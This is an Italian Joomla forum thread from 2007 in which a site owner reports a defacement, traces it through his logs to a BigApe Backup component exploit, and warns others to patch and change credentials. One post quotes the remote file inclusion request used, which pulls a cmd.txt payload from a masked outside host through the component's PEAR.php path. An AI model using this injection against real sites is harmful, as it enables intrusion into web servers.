Autore Topic: Mi hanno appena Hackerato il portale  (Letto 3344 volte)

Offline tanakkas

  • Nuovo arrivato
  • *
  • Post: 29
    • Mostra profilo
Mi hanno appena Hackerato il portale
« il: 08 Gen 2007, 02:15:09 »
Mi hanno appena Hackerato il portale.. 2 turchi...
ieri appena avevo aggiornato all'ultima versione..
come componente ho solo il Bigape backup..
il portale è su da 10 gg appena.. non capisco dove stia tutto quel divertimento...
ma sbaglio o con la 12 dovevamo essere un pò più sicuri?? ;)

ciao tan



Offline Bettinz

  • Instancabile
  • ******
  • Post: 2235
  • Sesso: Maschio
  • Mentre pensi, spesso perdi l'occasione.
    • Mostra profilo
Re: Mi hanno appena Hackerato il portale
« Risposta #1 il: 08 Gen 2007, 06:54:44 »
bigape backup sicuro che non sia bucato (la versione sul sito è del 2005, parecchio vecchia  ;) )?
le impostazioni del server han per caso register_globals su ON?

non dare colpe a Joomla in se, la 1.0.12 è molto sicura..
Bettinz.com

Offline bobighorus

  • Abituale
  • ****
  • Post: 840
  • Sesso: Maschio
    • Mostra profilo
Re: Mi hanno appena Hackerato il portale
« Risposta #2 il: 08 Gen 2007, 09:20:58 »
Ciao! Anche a me è successo in passato; se fai una ricerca nel forum trovi i post relativi. Comunque il problema è nel settare bene i permessi di file e cartelle. Cmq descrivi meglio cosa è successo! :)

Offline tanakkas

  • Nuovo arrivato
  • *
  • Post: 29
    • Mostra profilo
Re: Mi hanno appena Hackerato il portale
« Risposta #3 il: 08 Gen 2007, 13:10:31 »
..appena installato.. neanche il tempo di cambiare permessi o altro..
qui si trovano tutti i componenti con possibile falle
http://forum.joomla.org/index.php/board,346.0.html
bigApebackup è una fra quelli.. (ovviamente ho aggiornato tutto)
non ho ancora letto i logs per capire da dove sono entrati.. nel caso vifarò sapere..
però pensavo che appena installato e con un solo componente nonavessi di che preoccuparmi.. proprio perchè sapevo che alemeno fino a ieri la 12 fosse molto sicura..

si il server è su on.. e non riesco a farmelo cambiare.. cmq ho visto che utilizzando .htaccess si può tentare di "ingannare" il valore.. solo se.. etc etc.. come al solito sono più i se dei ma... :)  pazienza.. ho ripristinato tutto... ma ti dirò a parte cambiare tutte le psw e farle cambiare dal providere.. (si è fastidioso) la cosa mi ha divertito.. e in home ho messo pure un saluto ai miei amici Turchi.. :)

Dato che ci sono e visto riporto la mia esperienza..
installare, controllino dei componenti con problemi sul link in alto, htaccess e poi chiudere tutto, permessi e porte.. anche di cosa.. :)

ciao

tan


Offline promide

  • Nuovo arrivato
  • *
  • Post: 12
    • Mostra profilo
Re: Mi hanno appena Hackerato il portale
« Risposta #4 il: 08 Gen 2007, 13:29:41 »
bigape backup sicuro che non sia bucato (la versione sul sito è del 2005, parecchio vecchia  ;) )?
le impostazioni del server han per caso register_globals su ON?

non dare colpe a Joomla in se, la 1.0.12 è molto sicura..
---------------------------------------------------------------
posso chiedere cosa devo cambiare visto che a me nonostante ho effettuato i cambiamenti mi esce loggandomi da amministratore :
"...........

Le seguenti impostazioni PHP Server Security Settings non sono ottimali per la Sicurezza raccomandiamo quindi di modificarle:

    * Impostazione Joomla! RG_EMULATION è `ON` invece di `OFF` nel file global.php
      `ON` predefinito per ragioni di compatibilità

Prendere visione del post nel forum Official Joomla! Server Security per maggiori informazioni."
eppure dall'allegato....
sembra avere settato tutto in OFF...


bho come risolvere il problema ?


** codice rimosso; allegare il file **
« Ultima modifica: 08 Gen 2007, 13:35:23 da -napo- »

Offline surfbit

  • Instancabile
  • ******
  • Post: 7316
  • Sesso: Maschio
  • Verranno ignorati mp tecnici
    • Mostra profilo
Re: Mi hanno appena Hackerato il portale
« Risposta #5 il: 08 Gen 2007, 14:16:26 »
..appena installato.. neanche il tempo di cambiare permessi o altro..
qui si trovano tutti i componenti con possibile falle
http://forum.joomla.org/index.php/board,346.0.html
bigApebackup è una fra quelli.. (ovviamente ho aggiornato tutto)
non ho ancora letto i logs per capire da dove sono entrati.. nel caso vifarò sapere..
però pensavo che appena installato e con un solo componente nonavessi di che preoccuparmi.. proprio perchè sapevo che alemeno fino a ieri la 12 fosse molto sicura..

Vi ricordo che possono essere molte i fattori che possono influire su un attaccho. Hai controllato il tu pc se è esente da trojan. Basta uno di quelli un pò insidioso. Ti colleghi sempre dal tuo pc? Primo consiglio: cambiare tutte user e pass.
A volte basta un sorriso per far felice una persona.

La guida alla scelta dell'hosting per Joomla!  Joomlaspace.it: l'hosting per Joomla

Offline tanakkas

  • Nuovo arrivato
  • *
  • Post: 29
    • Mostra profilo
Re: Mi hanno appena Hackerato il portale
« Risposta #6 il: 08 Gen 2007, 20:00:10 »
ok.. controllato i log...
hanno usato l'exploit del babackup..  :(
è da ridere.. (cmq me lo son meritato.. >:()
posto il link.. PER CHI USA IL COMPONENTE DELLA BigApe Backup
AGGIORNATELO

Citazione
Full Name:         BigApe Backup
Short Name:      com_babackup
Version:              All Versions.
Fix:                       A patch is available from the developer. See this post.
References:        http://secunia.com/advisories/21574/
http://forum.joomla.org/index.php/topic,87736.0.html

Topic originale http://forum.joomla.org/index.php?topic=100145.0

si proprio lui.. hanno usato un sito d'appoggio e hanno provato in tutti i modi di entrare.. (ci son riusciti) hanno eseguito
http://www.xxxx.com/templates/cmd.txt?/administrator/components/com_babackup/classes/PEAR.php on line 13 e mi hanno bucato.. (fra parentesi hanno cambiato pure i permessi di molte cartelle (cambiando il gruppo da quello predefinito ad apache, con il risultato che non posso cancellare nulla.. :(, senza che me lo faccia l'amministratore del server)
vi dico la verità... non lo so se continuerò a usarlo pur essendoci la patch...

un consiglio.. ho anche un forum smf.. che dite cancello pure quello..?? potrebbero aver "corrotto" anche i dati del forum..??

tan

Citazione
posso chiedere cosa devo cambiare visto che a me nonostante ho effettuato i cambiamenti mi esce loggandomi da amministratore
hai controllato di aver il file global.php scrivibile?? hai fatto la modifica giusta?? devi aprire il file con un editor (è sufficiente anche il notepad) e seguire le istruzioni nel file su come modificare lo stato, e poi riupparlo nel tuo spazio sovrascrivendolo..
leggiti questo..
http://forge.joomla.it/documenti-forge/messaggi-di-sicurezza-in-joomla-1.0.11-3.html


« Ultima modifica: 08 Gen 2007, 20:02:19 da tanakkas »

Offline surfbit

  • Instancabile
  • ******
  • Post: 7316
  • Sesso: Maschio
  • Verranno ignorati mp tecnici
    • Mostra profilo
Re: Mi hanno appena Hackerato il portale
« Risposta #7 il: 08 Gen 2007, 20:21:33 »
Avevi fatto il back-up prima dell'intrusione?
A volte basta un sorriso per far felice una persona.

La guida alla scelta dell'hosting per Joomla!  Joomlaspace.it: l'hosting per Joomla

Offline tanakkas

  • Nuovo arrivato
  • *
  • Post: 29
    • Mostra profilo
Re: Mi hanno appena Hackerato il portale
« Risposta #8 il: 08 Gen 2007, 23:36:24 »
 ;D yessss....
almeno quello....
tan

Offline surfbit

  • Instancabile
  • ******
  • Post: 7316
  • Sesso: Maschio
  • Verranno ignorati mp tecnici
    • Mostra profilo
Re: Mi hanno appena Hackerato il portale
« Risposta #9 il: 09 Gen 2007, 12:35:12 »
Bene buona usanza!!  :) Quindi puoi cancellare tutto, e ripristinare il back up. Come ti ho detto cambia tutte le user e pass anche del forum.
A volte basta un sorriso per far felice una persona.

La guida alla scelta dell'hosting per Joomla!  Joomlaspace.it: l'hosting per Joomla

Offline proview

  • Esploratore
  • **
  • Post: 90
    • Mostra profilo
Re: Mi hanno appena Hackerato il portale
« Risposta #10 il: 09 Gen 2007, 14:35:48 »
raga riguardo alla permessi da come si fà e in particolare queli sono?

grazie e ciao

Offline tanakkas

  • Nuovo arrivato
  • *
  • Post: 29
    • Mostra profilo
Re: Mi hanno appena Hackerato il portale
« Risposta #11 il: 09 Gen 2007, 15:53:23 »
^_^ oltre alla psw del portale suggerisco di far cambiare anche quelle del database e del ftp, nonchè quelle della posta..
che dal mio errore qualcuno ne tragga giovamento..  :-\

per i permessi puoi usare il tuo programma ftp, o in alternativa bachend del portale/configurazione generale/ server

attento che alcune cartelle devo essere scrivibile per installare componenti, moduli, etc etc

 ;)tan

Offline bobighorus

  • Abituale
  • ****
  • Post: 840
  • Sesso: Maschio
    • Mostra profilo
Re: Mi hanno appena Hackerato il portale
« Risposta #12 il: 09 Gen 2007, 19:40:09 »
raga riguardo alla permessi da come si fà e in particolare queli sono?

grazie e ciao
se fai una ricerca nel forum trovi già spiegato questo argomento! :)

 

Host

Torna su